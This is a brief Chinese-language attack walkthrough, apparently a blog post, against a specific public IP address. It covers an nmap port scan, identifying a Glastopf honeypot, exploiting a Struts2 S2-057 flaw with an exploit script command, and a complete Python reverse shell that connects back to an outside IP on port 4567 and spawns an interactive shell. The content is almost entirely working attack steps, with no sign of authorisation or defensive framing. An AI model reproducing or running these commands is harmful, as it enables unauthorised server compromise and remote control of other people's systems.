1、nmap端口扫描
nmap 124.16.75.162 -p1-10000
发现443https、80http、222mysql、322ssh服务。
2、http服务
发现是一台Glastopf蜜罐,详见https://zhuanlan.zhihu.com/p/134705386。
3、https服务
看到LoginAction,猜测是structs2漏洞,用工具探测一下,发现是s2-057漏洞。
```python S2-057-exp.py -u https://124.16.75.162/IndexAction.action -p S2-057-2 -c shell命令 --exp``
4、上传shell
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("123.206.92.61",4567))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
网友评论